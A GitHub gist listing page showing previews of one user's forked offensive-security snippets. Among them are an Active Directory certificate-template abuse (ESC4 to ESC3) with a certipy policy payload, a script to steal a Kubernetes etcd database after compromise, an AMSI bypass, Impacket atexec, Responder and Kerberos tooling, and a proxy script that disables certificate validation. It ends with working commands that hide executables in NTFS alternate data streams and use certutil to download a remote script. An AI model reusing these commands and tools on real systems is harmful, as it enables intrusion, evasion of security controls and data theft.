Skip to content

Instantly share code, notes, and snippets.

View beerandgin's full-sized avatar

beerandgin beerandgin

42 followers · 480 following
View GitHub Profile
@beerandgin
beerandgin / Get-AzureADPSPermissionGrants.ps1
Created November 18, 2025 14:36 — forked from psignoret/Get-AzureADPSPermissionGrants.ps1
Get all permissions granted to an app in Azure AD
<#
.SYNOPSIS
Lists delegated permission grants (OAuth2PermissionGrants) and application permissions grants (AppRoleAssignments) granted to an app.
.PARAMETER ObjectId
The ObjectId of the ServicePrincipal object for the app in question.
.PARAMETER AppId
The AppId of the ServicePrincipal object for the app in question.
@beerandgin
beerandgin / ESC4-to-ESC3.sh
Created November 13, 2025 14:15 — forked from zimnyaa/ESC4-to-ESC3.sh
A simple way to abuse ESC4 without introducing ESC1 (creating an Enrollment Agent template instead).
# the policy JSON template for certipy is:
# {"showInAdvancedViewOnly": ["54525545"], "nTSecurityDescriptor": ["0100049c3000000000000000000000001400000002001c000100000000001400ff010f0001010000000000050b000000010500000000000515000000c8a31fdde9bab8902cae73bbf4010000"], "flags": ["313331363136"], "pKIDefaultKeySpec": ["32"], "pKIKeyUsage": ["8000"], "pKIMaxIssuingDepth": ["30"], "pKICriticalExtensions": ["322e352e32392e37", "322e352e32392e3135"], "pKIExpirationPeriod": ["004039872ee1feff"], "pKIOverlapPeriod": ["0080a60affdeffff"], "pKIExtendedKeyUsage": ["312e332e362e312e342e312e3331312e32302e322e31"], "pKIDefaultCSPs": ["312c4d6963726f736f667420456e68616e6365642043727970746f677261706869632050726f76696465722076312e30", "322c4d6963726f736f667420426173652043727970746f677261706869632050726f76696465722076312e30"], "msPKI-RA-Signature": ["30"], "msPKI-Enrollment-Flag": ["3332"], "msPKI-Private-Key-Flag": ["3136383432373532"], "msPKI-Certificate-Name-Flag": ["3333353534343332"], "msPKI-Minimal-Key-Size": ["32303438"]
@beerandgin
beerandgin / proxy
Last active October 27, 2025 21:38
proxy
# Disable SSL certificate validation for lab environment
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
# Function to get Server ID
function Get-ServerId {
param(
[string]$Target,
[string]$ProxyUrl = $null,
[pscredential]$ProxyCredential = $null
)
@beerandgin
beerandgin / magic_bytes.json
Created October 10, 2025 21:25 — forked from neutrinoguy/magic_bytes.json
File Signatures with there magic bytes.
{'ascii': '....',
'description': 'RedHat Package Manager (RPM) package',
'file_extension': 'rpm',
'hex': 'ed ab ee db',
'offset': '0'},
{'ascii': 'SP01',
'description': 'Amazon Kindle Update Package',
'file_extension': 'bin',
'hex': '53 50 30 31',
'offset': '0'},
@beerandgin
beerandgin / gist:0d2b263137faa1f4efdbbdeef6f7e7ad
Created September 29, 2025 21:49 — forked from garrettfoster13/gist:d5015133dcc728497f5941a431d6c515
Tweaked from Responder to Profile one remote SQL box
#! /usr/bin/env python3
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: [email protected]
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
@beerandgin
beerandgin / wrapper.py
Created September 29, 2025 21:48 — forked from garrettfoster13/wrapper.py
wrapping minikerberos
import sys
import argparse
import asyncio
def ldap_url(auth_options):
url_format = {
"kerb_password": f"kerberos+password://{{domain}}\\{{username}}:{{password}}@{{fqdn}}/?dc={{dcip}}",
"kerb_rc4": f"kerberos+rc4://{{domain}}\\{{username}}:{{nt}}@{{fqdn}}/?dc={{dcip}}",
"kerb_aes": f"kerberos+aes://{{domain}}\\{{username}}:{{aeskey}}@{{fqdn}}/?dc={{dcip}}",
@beerandgin
beerandgin / steal_etcd.sh
Created September 11, 2025 10:22 — forked from grahamhelton/steal_etcd.sh
Quick bash script to steal an etcd database
# This script attempts to take a snapshot of the kubernetes etcd database for exfiltration
# This should be run post-compromise of a node
#!/usr/bin/env bash
NOCOLOR=$(tput sgr0)
RED=$(tput setaf 1)
GREEN=$(tput setaf 2)
BLUE=$(tput setaf 4)
YELLOW=$(tput setaf 3)
TICK="$NOCOLOR[$GREEN+$NOCOLOR] "
@beerandgin
beerandgin / atexec_rpc.py
Created July 24, 2025 06:06 — forked from ThePirateWhoSmellsOfSunflowers/atexec_rpc.py
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
@beerandgin
beerandgin / Program.cs
Created July 24, 2025 06:04 — forked from wavvs/Program.cs
AMSI bypass via HAMSICONTEXT corruption (Windows 11 supported)
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Diagnostics;
using System.Threading;
using System.IO;
@beerandgin
beerandgin / Exe_ADS_Methods.md
Created July 24, 2025 06:02 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab